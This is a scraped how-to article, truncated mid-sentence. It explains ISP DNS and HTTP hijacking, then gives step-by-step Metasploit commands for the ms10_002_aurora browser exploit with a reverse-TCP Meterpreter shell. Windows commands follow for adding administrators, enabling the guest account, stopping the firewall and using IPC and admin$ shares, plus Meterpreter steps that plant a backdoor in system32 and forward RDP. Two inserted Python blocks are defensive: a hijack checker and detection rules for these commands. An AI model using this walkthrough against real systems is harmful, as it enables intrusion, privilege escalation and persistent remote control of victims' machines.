2025-01-19 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)06/01 Report--
DNS hijacking: the DNS servers that users rely on to surf the Internet are assigned by operators, so operators can do whatever they want on this node.
For example, when a user visits a website and enters the domain name, a normal DNS server returns the IP of that domain name. After DNS hijacking, the DNS server returns the IP of an intermediary server instead. The intermediary server always returns a 302, which makes the user's browser jump to a prepared web page carrying ads, and that page then opens the address the user originally visited in an iframe.
HTTP hijacking:
Protocol detection is set up on the operator's router node. Once a request is found to be an HTTP request for HTML content, it is intercepted and processed. The follow-up usually takes one of two forms: one returns a 302, as in DNS hijacking, to make the user's browser jump to another address; the other inserts JS or DOM-node ads into the HTML data returned by the server.
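The checker below is an added example, not part of the original article: it inspects one HTTP response for the three symptoms described above (a 302 to a foreign host, the original URL re-opened in an iframe, and a script injected from a foreign host). The function name, the indicator labels, the `expected_hosts` allow-list and all sample hosts are assumptions made for this illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class _SrcCollector(HTMLParser):
    """Collect the src attribute of every <iframe> and <script> tag."""
    def __init__(self):
        super().__init__()
        self.srcs = {"iframe": [], "script": []}

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if src and tag in self.srcs:
            self.srcs[tag].append(src)

def _page_key(url):
    # Compare pages by host and path only; hijack pages often append a marker query.
    parts = urlparse(url)
    return (parts.hostname, parts.path.rstrip("/"))

def hijack_findings(requested_url, status, headers, body, expected_hosts=()):
    """Return (indicator, host) tuples for the hijack patterns described above."""
    findings = []
    site_host = urlparse(requested_url).hostname
    allowed = set(expected_hosts) | {site_host}
    # A 3xx answer that sends the browser to a host the site does not use.
    location = {k.lower(): v for k, v in headers.items()}.get("location")
    if 300 <= status < 400 and location:
        host = urlparse(urljoin(requested_url, location)).hostname
        if host not in allowed:
            findings.append(("foreign-redirect", host))
    page = _SrcCollector()
    page.feed(body)
    # An interstitial page that re-opens the originally requested URL in an iframe.
    for src in page.srcs["iframe"]:
        if _page_key(urljoin(requested_url, src)) == _page_key(requested_url):
            findings.append(("original-in-iframe", site_host))
    # A script loaded from a host the site does not use (injected ad code).
    for src in page.srcs["script"]:
        host = urlparse(urljoin(requested_url, src)).hostname
        if host not in allowed:
            findings.append(("foreign-script", host))
    return findings

# Constructed samples (not captured traffic); all hosts are placeholders.
URL = "http://www.example.com/"
CLEAN = (200, {}, '<script src="/app.js"></script>'
                  '<script src="http://cdn.example.com/lib.js"></script>')
REDIRECT = (302, {"Location": "http://ads.isp.invalid/landing?u=http://www.example.com/"}, "")
INTERSTITIAL = (200, {}, '<script src="http://ads.isp.invalid/ad.js"></script>'
                         '<iframe src="http://www.example.com/?from=isp"></iframe>')
```

Running the same check from two different networks and comparing the findings separates a hijacking operator from a change made by the site itself.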
Ensure network connectivity and configure the network address.
Before using msfconsole for the first time, start the built-in PostgreSQL database and the Metasploit service:
Enable PostgreSQL: service postgresql start
Enable Metasploit: service metasploit start
root@kali:~# ps -e | grep 5432 (make sure that the postgresql service is enabled; it occupies port 5432 by default)
root@kali:~# msfconsole
Find the 10-002 vulnerability module: search 10-002
Use the vulnerability module: use exploit/windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp (defines the payload)
set lhost 192.168.48.123 (defines the local address)
set URIPATH / (defines the suffix of the URL; I only set a single / here)
exploit (runs the module)
Open the target website http://192.168.48.123:8080/ on the * host
sessions -i 1 (opens a connection to session 1)
sessions lists the sessions that have been successfully acquired; sessions -i connects to the Meterpreter session with the specified serial number
shell gets a remote command line on the target host
Create accounts and passwords through DOS
Common Windows commands
1. net localgroup administrators username /add (add the user to the administrators group to give them administrative privileges)
2. net user guest /active:yes (activate the guest user)
3. net user guest 12345 (change the guest password to 12345)
4. net user (view account attributes)
5. net start (check which services are enabled)
6. net time \\target-ip (check the time on the other host)
7. net view (check which shares are enabled in the local area network)
8. net share (view the shares enabled locally)
9. net share C$ /del (delete the default share of disk C)
10. copy xx.exe \\ip\admin$\System32 (copy the current xx.exe to the System32 directory of the other host's Admin$ share)
11. sc config tlntsvr start= auto (change the startup mode of the telnet service to automatic; note the space in front of auto)
12. net stop sharedaccess (turn off the firewall that comes with the system)
13. net send IP message (send a message to the target IP using the messenger service)
14. tasklist (view processes)
15. taskkill (terminate a process); ntsd forcibly terminates a process
16. services.msc (open the services console of the local computer)
17. net use \\ip\ipc$ "" /user:"" (create an empty IPC connection)
18. net use \\ip\ipc$ "password" /user:"user name" (establish a non-empty IPC connection; non-empty means an account and password are required)
19. net use \\ip\ipc$ /del (delete the empty IPC connection)
20. net use z: \\127.0.0.1\c$ (map disk C of the target host to local disk Z)
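Several of the commands in this list change accounts, shares, services or the firewall, so they are worth alerting on when they show up in process-creation logs. The matcher below is an added example, not part of the original article; the rule names and the sample command lines are constructed for this illustration.

```python
import re

NET = r"\bnet1?(?:\.exe)?\s+"  # net.exe hands off to net1.exe, so match both
# Rule names are labels chosen for this example; patterns follow the list above.
RULES = [
    ("admin-group-add",   NET + r"localgroup\s+administrators\s+.*/add\b"),
    ("guest-activated",   NET + r"user\s+guest\s+.*/active:yes\b"),
    ("firewall-stopped",  NET + r'stop\s+"?sharedaccess\b'),
    ("default-share-del", NET + r"share\s+[a-z]\$\s*/del\b"),
    ("ipc-null-session",  NET + r'use\s+\\\\\S+\\ipc\$\s+""\s+/user:""'),
    ("admin-share-copy",  r"\bcopy\s+\S+\s+\\\\\S+\\admin\$"),
    ("telnet-autostart",  r"\bsc(?:\.exe)?\s+config\s+tlntsvr\s+.*start=\s*auto\b"),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]

def flag_command_lines(command_lines):
    """Return (line_number, rule_name) for every rule a command line matches."""
    hits = []
    for number, line in enumerate(command_lines, start=1):
        normalized = " ".join(line.split())  # collapse runs of whitespace
        for name, pattern in COMPILED:
            if pattern.search(normalized):
                hits.append((number, name))
    return hits

# Constructed command lines (not real log data); account names are placeholders.
SAMPLE_LOG = [
    r"C:\Windows\System32\net.exe user",
    r"net  localgroup administrators svc_backup /ADD",
    r"net1 user guest /active:yes",
    r"net user guest 12345",
    r"net stop sharedaccess",
    r'net use \\192.168.48.100\ipc$ "" /user:""',
    r"net view",
    r"sc config tlntsvr start= auto",
]

if __name__ == "__main__":
    for number, rule in flag_command_lines(SAMPLE_LOG):
        print(number, rule, SAMPLE_LOG[number - 1])
```

Read-only commands such as net user, net view and net start are left unflagged on purpose, since administrators run them routinely.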
Connect to the system remotely
rdesktop -u administrator -p 123 192.168.48.100:3389
getuid shows the user of the process that meterpreter is injected into on the target host
upload uploads files to the target host, for example transferring the backdoor program setup.exe to the system32 directory of the target host:
upload setup.exe C:\\windows\\system32\
portfwd: port forwarding
For example, 3389 is enabled on the target host, but access is allowed only from specific IPs, so the * host cannot connect. You can use the portfwd command to forward port 3389 of the target host to another port.
For example: portfwd add -l 1122 -p 3389 -r 192.168.48.100
This forwards port 3389 of the target host 192.168.48.100 to port 1122.
You only need to connect to port 1122 of the target to open the remote desktop.
rdesktop -u administrator -p 123456 192.168.48.100:1122
sysinfo shows the system information of the target host
ps shows the process information running on the target host, using the